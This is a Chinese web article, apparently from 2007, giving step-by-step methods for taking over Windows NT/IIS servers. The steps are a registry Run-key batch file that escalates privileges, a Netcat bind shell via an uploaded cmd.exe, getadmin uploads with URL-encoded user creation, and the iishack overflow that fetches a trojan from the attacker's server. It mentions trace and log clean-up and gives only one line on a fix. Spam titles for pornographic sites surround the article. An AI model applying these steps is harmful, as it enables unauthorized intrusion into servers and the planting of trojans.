国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關注微信公眾號

教你獲取WindowsNT的Admin權限的方法
2007-01-15   

一、通過修改注冊表

凡是具有登錄NT本機的用戶,例如IUSR_machine,都具有對 HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CurrentVersion\Run 項的可讀可寫權限,該用戶可以遠程訪問這個項。比如,他可以創建一個bat文件,文件內容為:cmd.exe /c net localgroup administrators IUSR_machine /add,把該文件copy到winnt目錄下,然后在注冊表上述的項添加一個數值,指向這個文件。

那么,當下次Admin登錄到該機器上時,就會自動把IUSR_machine添加到Administrators組。

另,注冊表鍵HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Common Startup 也可以這么做。

二、自建Telnet服務在NT上執行指令

要求用戶有文件上傳權限,而且該目錄位于web目錄下,該目錄允許執行,下面是具體步驟。

假設你的目錄是www.xxx.com/frankie,那么,把cmd.exe(位于C:\winnt\system32\cmd.exe)和Netcat里面包含的nc.exe傳到這個目錄上去。

然后,在瀏覽器端輸入:

http://www.xxx.com/frankie/cmd.e ... 20-t%20-e%20cmd.exe

這時候,你的瀏覽器將停止不動,實際上,Server上的Telnet的服務已經產生了。

這時,用Telnet連接www.xxx.com的23端口。你發現,不用密碼,不用登陸,對方C:\提示符已經出現在你的眼前!更妙的是,這個Telnet server是一個一次性的服務,當客戶端一退出,該服務也將終止。

Netcat不同于一般的特洛伊木馬,它可以構建任何的TCP連接服務。在瀏覽器端輸入上述的字符串,等價于在NT的Dos方式下輸入

nc -l -p 23 -t -e cmd.exe

這將把cmd.exe綁定到23端口上。

三、入侵NTserver典型途徑V2.0

1、如果你有NT/IIS服務器的任何一個帳號,哪怕是guest帳號,都可以獲得root。

2、用Netcat和iishack可以獲得root。

3、Iusr_計算機名這個帳號有ftp上傳,web執行等權限。

4、在Web server上執行程序是入侵NT的關鍵。

5、要在Web server上執行程序就先要上傳文件到cgi-bin目錄或者scripts目錄等有執行權限的目錄上去。

在本文中,目標機器的名稱是ntsvr2,目標機器的域名是www.xxx.com,目標機器上有scripts和cgi-bin目錄,scripts目錄下有uploadn.asp等asp程序,可能有guest帳號,肯定有iusr_ntsvr2這個帳號。

第一個方法、用Iusr_ntsvr2后者Guest這兩個帳號

這里假設我們已經破解了這個帳號的密碼,在瀏覽器輸入:

http://www.xxx.com/scripts/uploadn.asp

guest和iusr_ntsvr2這兩個帳號都可以進這個asp頁面,在這里把文件getadmin和gasys.dll以及cmd.exe上傳到/scripts目錄。

然后輸入:

http://www.xxx.com/scripts/getadmin.exe?IUSR_ntsvr2

大約十多秒后屏幕顯示:

CGI Error

這時有90%的可能是:你已經把IUSR_ntsvr2升級為Administrator,也就是任何訪問該web站的人都是管理員。

下面可以Add user:

http://www.xxx.com/cgi-bin/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%20china%20news%20/add

這樣就創建了一個叫china用戶,密碼是news,然后:

http://www.xxx.com/scripts/getadmin.exe?china

第二個方法、用匿名Ftp

如果允許匿名帳號ftp登陸的設定,也給我們帶來了突破NT server的機會。我們用ftp登陸一個NT server,比如:www.xxx.com(示例名):

ftp www.xxx.com 
Connected to www.xxx.com 
220 ntsvr2 Microsoft FTP Service (Version 3.0).

Ntsvr2這個東西暴露了其NETbios名,那么在IIS的背景下,必然會有一個IUSR_ntsvr2的用戶帳號,屬于Domain user組,這個帳號我們以后要用來獲取Administrator的權限。

User (www.xxx.com:(none)):anonymous 
331 Anonymous access allowed, send identity (e-mail name) as password.

Password:輸入 guest@ 或者guest。

對于缺乏網絡安全知識的管理員來說,很多人沒有將guest帳號禁止,或者沒有設置密碼。那么guest帳號就是一個可用的正確的用戶帳號,雖然只屬于Domain guest組。在這種情況下我們就可以進NT server的ftp了。

進去以后,看看目錄列表,試試 cd /scripts 或cgi-bin等關鍵目錄,如果運氣好,改變目錄成功,這時你就有了80%的把握。

把Winnt下的cmd.execopy到cgi-bin,把getadmin和gasys.dll傳上去到cgi-bin,然后輸入:

http://www.xxx.com/cgi-bin/getadmin.exe?IUSR_ntsvr2

大約十多秒后屏幕顯示:

CGI Error

這時有90%的可能是:你已經把IUSR_ntsvr2升級為Administrator,也就是任何訪問該web站的人都是管理員。

下面可以add user:

http://www.xxx.com/cgi-bin/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%20china%20news%20/add

這樣就創建了一個叫china用戶,密碼是news,然后:

http://www.xxx.com/cgi-bin/getadmin.exe?china

或者

http://www.xxx.com/scripts/tools/getadmin.exe?china

你再用China的帳號登陸,就可以有最大的權限了,也可以用上面的cmd.exe的方法直接修改 如果沒有cmd.exe,也可以自己傳一個上去到scripts/tools或者cgi-bin目錄。

第三個方法、用netcat和iishack

如果你熟悉使用Netcat這個工具,你就知道,netcat可以利用NT的弱點在其上綁定端口,下面用eEye的工具已經介紹過,如果你熟悉Netcat,成功的可能性會更大。

IIS的ISAPI的毛病(*.HTR) 我們再來看看eEye最近這兩天發現的一個關于NT/IIS的問題和工具。在IIS的/Inetsrv目錄下,有個DLL文件叫ism.dll,這個模塊在web運行的時候就被加載到較高的內存地址,并且導致了零字節問題到處出現IIShack.asm,利用這個毛病,eEye寫了兩個程序:

iishack.exe 
ncx99.exe

為達目的你必須自己有一個web server,把ncx99.exe和netbus木馬傳到這個web server的目錄下,比如你的web server是:

www.mysvr.com? 而對方的IIS server是www.xxx.com

則:

iishack www.xxx.com 80 www.mysvr.com/ncx99.exe?? (注意,不要加http://字符!)

上述命令輸入后這時你應該可以看到

------(IIS 4.0 remote buffer overflow exploit)----------------- 
(c) dark spyrit -- barns@eeye.com. 
http://www.eEye.com 
[usage: iishack ] 
eg - iishack www.xxx.com 80 www.mysvr.com/thetrojan.exe 
do not include 'http://' before hosts! 
--------------------------------------------------------------- 
Data sent!

然后,再把Netbus等特洛伊木馬傳到對方機器上去:

iishack www.example.com 80 www.myserver.com/netbus.exe

ncx99.exe實際上是有名的Netcat的變種,它把對方server的cmd.exe綁定到Telnet服務。 ncx.exe 這是較早的版本,是把端口綁到80的,由于80端口跑web服務,端口已經被使用。所以可能不一定有效。然后,用Telnet到對方的99或80端口:

Telnet www.xxx.com 99

結果是這樣:

Microsoft(R) Windows NT(TM) 
(C) Copyright 1985-1996 Microsoft Corp. 

C:\>[You have full access to the system, happy browsing :)] 
C:\>[Add a scheduled task to restart inetinfo in X minutes] 
C:\>[Add a scheduled task to delete ncx.exe in X-1 minutes] 
C:\>[Clean up any trace or logs we might have left behind.]

這樣,你就完全控制了其硬盤上的文件!注意,如果你type exit退出,對方server上的這個進程也會退出。

補救方法:在IIS的www service屬性中將主目錄的應用程序設置的*.htr的映射刪除。

其它:用Retina.exe得到NT域內的帳號清單,逐個嘗試這些帳號,如果有的密碼薄弱而被你猜出來,就可以用上面的方法來獲取NT的Admin。

責任編輯 趙毅 zhaoyi#51cto.com TEL:(010)68476636-8001


熱詞搜索:

上一篇:Windows系統中多種隱藏超級用戶方法
下一篇:ASP木馬Webshell的安全防范解決辦法

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
麻豆一区二区99久久久久| 精品粉嫩aⅴ一区二区三区四区| 欧美三级电影网| 日韩视频一区二区三区| 久久久精品综合| 亚洲精品ww久久久久久p站| 午夜精品影院在线观看| 国产一区二区福利视频| 99r国产精品| 欧美一级夜夜爽| 中日韩av电影| 日韩在线一区二区| 成人av影视在线观看| 欧美酷刑日本凌虐凌虐| 中文一区一区三区高中清不卡| 一区二区三区免费网站| 国产真实乱偷精品视频免| 日本韩国欧美在线| 欧美精品一区二区在线播放| 亚洲欧美日韩在线| 国产一区二区不卡在线| 精品视频一区二区不卡| 国产三级精品在线| 日韩精品乱码av一区二区| 成人app在线观看| 日韩欧美国产综合一区| 一区二区三区在线免费视频| 精品无码三级在线观看视频 | 欧美一区二区三区日韩视频| 国产精品99久久久久| 欧美综合色免费| 国产亚洲精品7777| 日韩精品91亚洲二区在线观看| 成人avav影音| 久久久欧美精品sm网站| 日韩成人精品视频| 色美美综合视频| 国产精品嫩草影院av蜜臀| 美美哒免费高清在线观看视频一区二区| 97se亚洲国产综合自在线观| 久久久久久久久一| 免费高清视频精品| 欧美三级欧美一级| 一区二区三区四区中文字幕| 国产一区二区精品久久91| 91精品免费观看| 亚洲成人第一页| 色婷婷国产精品| 国产精品久久久久一区| 国产传媒欧美日韩成人| 日韩精品一区二区三区中文不卡 | 91成人免费在线视频| 亚洲国产精品传媒在线观看| 国产一区二区在线视频| 在线成人午夜影院| 偷拍与自拍一区| 欧美日韩成人激情| 亚洲综合一区二区精品导航| 91热门视频在线观看| 国产精品美女久久久久aⅴ国产馆| 国模冰冰炮一区二区| 欧美xfplay| 蜜桃久久久久久| 日韩一本二本av| 蜜桃av一区二区三区电影| 91麻豆精品国产91久久久久久| 五月婷婷综合激情| 欧美揉bbbbb揉bbbbb| 亚洲超碰97人人做人人爱| 欧美视频一区在线| 亚洲国产成人av| 欧美另类videos死尸| 亚洲成av人片观看| 欧美高清性hdvideosex| 日韩电影在线看| 日韩三级视频中文字幕| 美女一区二区视频| 国产精品白丝av| 欧美国产综合色视频| 福利一区二区在线观看| 国产精品久久久久永久免费观看 | 国产亲近乱来精品视频| 国产激情视频一区二区在线观看| 久久久综合精品| 成人黄色av电影| 亚洲精品亚洲人成人网| 欧美最猛黑人xxxxx猛交| 午夜精品123| 日韩欧美一区在线| 国产成人在线观看免费网站| 国产精品进线69影院| 色综合久久久久久久久| 亚洲电影第三页| 欧美一区二区三区视频在线观看| 久久av老司机精品网站导航| 国产三级一区二区三区| aaa欧美日韩| 亚洲一区在线观看免费 | 美女免费视频一区二区| 亚洲精品一区二区三区99| 成a人片亚洲日本久久| 亚洲一区二区三区四区中文字幕| 6080午夜不卡| 国产毛片精品一区| 亚洲精品乱码久久久久久久久| 在线不卡a资源高清| 国产精品66部| 亚洲一区二区欧美| 欧美电影免费观看高清完整版在线 | 成人午夜私人影院| 亚洲国产精品久久久男人的天堂| 日韩欧美电影在线| av成人老司机| 日韩avvvv在线播放| 国产免费观看久久| 欧美性猛交xxxxxxxx| 久久精品国产精品青草| 国产精品久久久久aaaa| 欧美日韩国产在线观看| 国产91丝袜在线播放九色| 亚洲图片欧美色图| 久久亚洲一区二区三区明星换脸| 9色porny自拍视频一区二区| 日韩高清不卡一区二区三区| 国产精品网曝门| 欧美一级欧美一级在线播放| 丰满岳乱妇一区二区三区| 丝袜亚洲精品中文字幕一区| 亚洲国产精品二十页| 欧美一区二区美女| 99国产精品久久久久久久久久久| 免费不卡在线视频| 亚洲欧美日韩人成在线播放| 欧美精品一区视频| 欧美精品自拍偷拍| 99精品欧美一区| 激情成人午夜视频| 亚洲va在线va天堂| 国产精品剧情在线亚洲| 日韩精品一区二区三区在线播放 | 午夜不卡av免费| 久久伊99综合婷婷久久伊| 91福利视频在线| 国产99一区视频免费| 日产欧产美韩系列久久99| 亚洲男同性恋视频| 久久精品一区蜜桃臀影院| 91麻豆精品国产91| 色综合久久中文综合久久97| 国产福利电影一区二区三区| 美女性感视频久久| 亚洲资源中文字幕| 国产精品电影一区二区三区| 久久香蕉国产线看观看99| 欧美一级片免费看| 欧美日韩日日夜夜| 91福利在线播放| 91蜜桃在线免费视频| 成人午夜精品在线| 国产精品资源网| 国产中文字幕精品| 久久精品国产亚洲高清剧情介绍 | 日本韩国视频一区二区| 成人av片在线观看| 国产精品911| 国产综合久久久久久鬼色| 另类的小说在线视频另类成人小视频在线 | 蜜臀av一区二区| 石原莉奈在线亚洲二区| 亚洲成人综合网站| 亚洲在线视频网站| 一级中文字幕一区二区| 亚洲日本乱码在线观看| 国产精品久久久久久户外露出 | 成人黄动漫网站免费app| 国产盗摄精品一区二区三区在线| 久久99久久99精品免视看婷婷| 日韩av在线免费观看不卡| 天天爽夜夜爽夜夜爽精品视频| 亚洲福利视频一区| 亚洲国产sm捆绑调教视频| 亚洲成年人网站在线观看| 亚洲chinese男男1069| 亚洲综合色丁香婷婷六月图片| 亚洲欧美成人一区二区三区| 日韩伦理av电影| 亚洲视频一区在线| 亚洲一区二区影院| 午夜伊人狠狠久久| 五月激情综合网| 久久精品国产**网站演员| 九九久久精品视频| 国产精品一线二线三线精华| 国产精品自在在线| 成人av先锋影音| 欧美性猛交xxxx乱大交退制版| 欧美日韩高清影院| 欧美不卡在线视频| 国产校园另类小说区| √…a在线天堂一区|